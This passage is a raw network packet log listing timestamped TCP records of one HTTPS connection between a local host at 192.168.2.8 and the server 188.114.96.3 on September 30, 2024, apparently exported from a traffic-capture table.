                                                                                                                                                                      Sep 30, 2024 18:19:12.534320116 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.534339905 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.534558058 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.534569979 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.534637928 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.536736965 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.536753893 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.536827087 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.536837101 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.536884069 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.537055969 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.537070036 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.537137985 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.537143946 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.537195921 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.537736893 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.537755966 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.537811995 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.537817955 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.537879944 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.538105011 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.538120031 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.538175106 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.538182020 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.538319111 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.538727999 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.538746119 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.538817883 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.538825035 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.538877010 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.539299011 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.539314032 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.539367914 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.539374113 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.539417028 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.539747953 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.539767027 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.539819956 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.539829969 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.539874077 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.622056007 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.622077942 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.622158051 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.622168064 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.622225046 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.625612974 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.625633001 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.625731945 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.625739098 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.625785112 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.626399040 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.626419067 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.626528025 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.626535892 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.626578093 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.626837969 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.626857996 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.626914978 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.626921892 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.626950026 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.626950026 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.626987934 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.627006054 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.627058983 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.627069950 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.627197027 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.627752066 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.627772093 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.627898932 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.627904892 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.627959967 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.628293037 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.628309965 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.628366947 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.628376007 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.628420115 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.628794909 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.628819942 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.628860950 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.628873110 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.628902912 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.628902912 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.710022926 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.710042953 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.710196018 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.710206985 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.710258961 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.712502003 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.712521076 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.712569952 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.712583065 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.712624073 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.713387966 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.713408947 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.713452101 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.713459969 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.713521957 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.714673042 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.714690924 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.714730978 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.714737892 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.714776039 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.714776039 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.715677023 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.715693951 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.715786934 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.715794086 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.715847015 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.716046095 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.716062069 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.716140032 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.716146946 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.716233969 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.716253042 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.716264009 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.716270924 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.716295004 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.716325045 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.716597080 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.716614962 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.716677904 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.716684103 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.716805935 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.797096014 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.797121048 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.797251940 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.797265053 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.797322035 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.800873995 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.800893068 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.801007986 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.801014900 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.801064014 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.801386118 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.801403999 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.801481962 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.801481962 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.801489115 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.801533937 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.802731037 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.802748919 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.802818060 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.802824974 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.802877903 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.803308010 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.803328037 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.803404093 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.803410053 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.803452015 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.803621054 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.803670883 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.803715944 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.803715944 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.803726912 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.803772926 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.803956032 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.803976059 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.804029942 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.804038048 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.804078102 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.805164099 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.805182934 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.805255890 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.805262089 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.805319071 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.884923935 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.884946108 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.885029078 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.885029078 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.885040998 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.885104895 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.888046026 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.888063908 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.888156891 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.888164043 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.888238907 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.888931990 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.888950109 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.889005899 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.889013052 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.889049053 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.889049053 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.890194893 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.890213013 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.890284061 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.890290976 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.890342951 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.890614986 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.890630007 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.890700102 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.890706062 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.890777111 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.890935898 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.890949965 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.891004086 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.891010046 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.891031981 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.891053915 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.891339064 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.891352892 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.891407013 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.891412973 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.891478062 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.893225908 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.893241882 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.893321991 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.893328905 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.893374920 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.972767115 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.972790003 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.972979069 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.972995043 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.973035097 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.975625038 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.975646973 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.975732088 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.975739956 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.975785017 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.976576090 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.976594925 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.976663113 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.976670027 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.976720095 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.977801085 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.977819920 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.977874041 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.977881908 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.977893114 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.977935076 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.978087902 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.978105068 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.978166103 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.978172064 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.978180885 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.978251934 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.978482008 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.978497028 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.978538036 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.978543997 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.978579998 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.978579998 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.978868008 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.978883028 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.978949070 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.978955030 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.978993893 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.980401993 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.980417967 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.980485916 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:12.980492115 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:12.980535984 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.060417891 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.060439110 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.060570955 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.060585976 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.060647964 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.063482046 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.063500881 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.063585043 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.063591957 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.063647032 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.064508915 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.064524889 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.064568996 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.064577103 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.064615965 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.064615965 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.065345049 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.065361023 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.065418005 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.065424919 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.065471888 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.066220045 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.066236973 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.066374063 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.066380978 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.066437006 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.066540003 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.066555977 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.066608906 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.066615105 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.066657066 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.066657066 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.066940069 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.066956043 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.067030907 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.067037106 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.067048073 CEST49706443192.168.2.8188.114.96.3
